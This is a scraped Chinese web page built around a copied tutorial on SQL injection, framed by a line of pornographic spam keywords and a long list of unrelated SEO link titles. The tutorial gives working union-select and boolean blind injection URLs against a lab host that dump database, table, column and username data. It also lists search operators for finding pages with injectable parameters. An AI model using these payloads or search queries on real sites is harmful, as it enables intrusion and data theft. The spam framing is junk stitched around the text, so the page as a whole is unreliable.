国产亚洲精品福利在线无卡一,国产精久久一区二区三区,亚洲精品无码国模,精品久久久久久无码专区不卡

當前位置: 首頁 > news >正文

獨立網(wǎng)站怎么做推廣google chrome download

獨立網(wǎng)站怎么做推廣,google chrome download,簡述網(wǎng)站欄目管理,網(wǎng)站信息登記表一、SQL注入分類 SQL注入根據(jù)攻擊方式的不同,可以分為以下幾種類型: 數(shù)字型注入字符型注入報錯注入布爾盲注時間盲注聯(lián)合查詢注入基于堆疊的查詢注入 二、SQL注入流程 發(fā)現(xiàn)注入點猜測字段數(shù)確定顯示字段獲取數(shù)據(jù)庫信息獲取數(shù)據(jù)庫中的表獲取表中的字段獲…

一、SQL注入分類

SQL注入根據(jù)攻擊方式的不同,可以分為以下幾種類型:

  1. 數(shù)字型注入
  2. 字符型注入
  3. 報錯注入
  4. 布爾盲注
  5. 時間盲注
  6. 聯(lián)合查詢注入
  7. 基于堆疊的查詢注入

二、SQL注入流程

  1. 發(fā)現(xiàn)注入點
  2. 猜測字段數(shù)
  3. 確定顯示字段
  4. 獲取數(shù)據(jù)庫信息
  5. 獲取數(shù)據(jù)庫中的表
  6. 獲取表中的字段
  7. 獲取字段中的數(shù)據(jù)
例子:

獲取數(shù)據(jù)庫名參考

  1. 字符限制:數(shù)據(jù)庫的名字可以包含字母、數(shù)字、下劃線和美元符號($)。但是,名字不能以數(shù)字開頭。

  2. 大小寫敏感性:在Windows系統(tǒng)上,MySQL數(shù)據(jù)庫的名字默認是不區(qū)分大小寫的。但在大多數(shù)Unix/Linux系統(tǒng)上,數(shù)據(jù)庫的名字是區(qū)分大小寫的。為了確??缙脚_的兼容性,建議使用小寫字母。

  3. 長度限制:數(shù)據(jù)庫的名字最大長度為64個字符。

1.發(fā)現(xiàn)網(wǎng)站請求為get,如果存在注入點這里不會報錯
http://192.168.10.111/news/show.php?id=-1 and 1=12.發(fā)現(xiàn)注入點后猜字段,逐一嘗試猜測字段數(shù)
http://192.168.10.111/news/show.php?id=-1 order by 16
-- order by x 根據(jù)第x個字段排序,如果出現(xiàn)報錯說明字段不存在3.發(fā)現(xiàn)不報錯出現(xiàn),并且出現(xiàn)的數(shù)值,為顯示字段
http://192.168.10.111/news/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,154.脫庫
//獲取當前數(shù)據(jù)庫
http://192.168.10.111/news/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,database(),12,13,14,15//獲取數(shù)據(jù)庫中的表,hex的作用是因為拼接后的字符串有‘,’會混淆
192.168.10.111/news/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,
hex(group_concat(table_name))
,12,13,14,15 from information_schema.tables where table_schema='news'//獲取表中的字段
192.168.10.111/news/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,
hex(group_concat(column_name))
,12,13,14,15 from information_schema.columns where table_schema='news' and table_name='news_users

三、sql盲注:

構(gòu)造真或者假的問題對數(shù)據(jù)庫進行提問

尋找sql注入點

1.在url后添加? ?’? 如果報錯說明有注入點

2.對數(shù)值型注入點可以進行減法

3.對在url后添加? ?and 1=2? ?如果沒有正常顯示,說明有注入點

例子:
-- 猜測數(shù)據(jù)庫長度
http://192.168.10.111/news/show.php?id=46 and length(database())=4-- 或取當前數(shù)據(jù)庫第二個字符
http://192.168.10.111/news/show.php?id=46 and substr(database(),2,1)='e'-- 獲取news數(shù)據(jù)庫中所有表名長度
http://192.168.10.111/news/show.php?id=46 and length((select group_concat(table_name) 
from information_schema.tables where table_schema='news'))=98-- 獲取表名字符串第一個字符
http://192.168.10.111/news/show.php?id=46 and substr((select group_concat(table_name) 
from information_schema.tables where table_schema='news'),1,1)='n'-- 獲取news庫,news_users表中字段字符串的字符串長度
http://192.168.10.111/news/show.php?id=46 and length((select group_concat(column_name) 
from information_schema.columns where table_schema='news' and table_name='news_users'))=24-- 獲取字段第一個字符
http://192.168.10.111/news/show.php?id=46 and substr((select group_concat(column_name) 
from information_schema.columns where table_schema='news' and table_name='news_users'),1,1)='u'-- 獲取username字段中的信息長度
http://192.168.10.111/news/show.php?id=46 and length((select group_concat(username) from 
news.news_users))=5-- 獲取username字段的字符
http://192.168.10.111/news/show.php?id=46 and substr((select group_concat(username) fromnews.news_users),2,1)='d'

?

注:查找網(wǎng)站資源可使用hacking語法

inurl:?id=????????????????url中存在:?id=

Intitle:admin? ? ? ? ? ? title中存在:admin

filetype:txt? ? ? ? ? ? ? ? 查找網(wǎng)站中txt文件

site:www.baidu.com 在百度中查找

http://m.aloenet.com.cn/news/39332.html

相關(guān)文章:

  • 網(wǎng)站開發(fā)的前端框架有哪些口碑營銷的案例及分析
  • 視頻網(wǎng)站怎么做算法上海seo外包公司
  • 做搜狗網(wǎng)站優(yōu)化南京seo推廣
  • 定州網(wǎng)站建設(shè)公司最新網(wǎng)絡(luò)營銷方式有哪些
  • wordpress簡介怎么改東莞seo收費
  • 手把手教做網(wǎng)站做國外網(wǎng)站
  • 順德網(wǎng)站制作seo課程培訓(xùn)要多少錢
  • 做網(wǎng)站一個月能掙多少錢網(wǎng)絡(luò)營銷師證書含金量
  • 深圳網(wǎng)站優(yōu)化團隊長春網(wǎng)站優(yōu)化服務(wù)
  • html可視化編輯軟件東莞網(wǎng)站優(yōu)化公司哪家好
  • 做網(wǎng)站用哪個軟件寫比較好免費優(yōu)化網(wǎng)站
  • 雄縣網(wǎng)站建設(shè)免費海報模板網(wǎng)站
  • 網(wǎng)站備案后可以更換域名嗎網(wǎng)絡(luò)營銷是學(xué)什么
  • 濟南網(wǎng)站優(yōu)化公司拼多多seo是什么意思
  • 360網(wǎng)站建設(shè)公司哪家好查詢關(guān)鍵詞網(wǎng)站
  • 哈爾濱網(wǎng)站建設(shè)資海海外市場推廣做什么的
  • 中學(xué)網(wǎng)站管理系統(tǒng)下載不受限制的搜索引擎
  • 邯鄲做網(wǎng)站優(yōu)化百度網(wǎng)盤手機app下載安裝
  • 寶雞營銷型網(wǎng)站開發(fā)信息流優(yōu)化師工作內(nèi)容
  • 深喉嚨企業(yè)網(wǎng)站系統(tǒng)網(wǎng)絡(luò)營銷渠道策略有哪些
  • 男男互做網(wǎng)站泰國推廣網(wǎng)站有效的方法
  • 網(wǎng)站建設(shè)合同有效期河北網(wǎng)站seo外包
  • 手機購買網(wǎng)站源碼軟文推廣怎么寫
  • 視頻網(wǎng)站如何做推廣搜索引擎大全網(wǎng)站
  • 天津外貿(mào)營銷型網(wǎng)站建設(shè)公司seo頁面鏈接優(yōu)化
  • 平面設(shè)計班seo優(yōu)化廣告
  • 買cms做網(wǎng)站seo推廣軟件品牌
  • 香港外貿(mào)網(wǎng)站建設(shè)谷歌搜索引擎網(wǎng)址
  • 網(wǎng)站子頁怎么做如何能查到百度搜索排名
  • 北京大學(xué)學(xué)術(shù)學(xué)風(fēng)建設(shè)網(wǎng)站網(wǎng)站運營優(yōu)化培訓(xùn)